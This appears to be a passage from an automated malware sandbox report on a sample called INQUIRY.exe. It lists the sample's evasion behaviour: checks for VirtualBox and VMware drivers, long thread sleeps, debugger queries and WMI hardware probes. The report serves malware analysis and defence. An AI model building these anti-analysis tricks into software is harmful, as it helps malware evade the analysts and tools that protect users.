                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                    Malware Analysis System Evasion:

                    Contains functionality to detect sleep reduction / modifications
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exe File opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exe File opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exe File opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exe File opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,6_2_00408836
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_00454E54
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,2_2_00454E54
                    Source: C:\Users\user\Desktop\INQUIRY.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exe Thread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6680 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6756 Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4780 Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6820 Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6780 Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -99860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -99750s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98797s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -98047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97406s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97297s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -97047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -96953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980 Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4476 Thread sleep count: 213 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6152 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6432 Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6444 Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6292 Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5900 Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -98062s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -97812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -97609s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848 Thread sleep time: -97250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6600 Thread sleep count: 150 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 7136Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6320Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6328Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 1548Thread sleep count: 51 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5492Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5560Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5508Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5956Thread sleep count: 99 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6680Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6756Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4780Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6820Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6780Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99750s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98797s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97406s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97297s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4476Thread sleep count: 213 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6432Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6444Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6292Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5900Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile opened: PhysicalDrive0
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,0_2_004089B8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AE8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004089B8 FindFirstFileA,GetLastError,2_2_004089B8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00405AE8
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00406EC3
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,6_2_00408441
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,6_2_00407E0E
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00421010 GetSystemInfo,0_2_00421010
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW|p
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWonic0Local Area Connection* 7
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
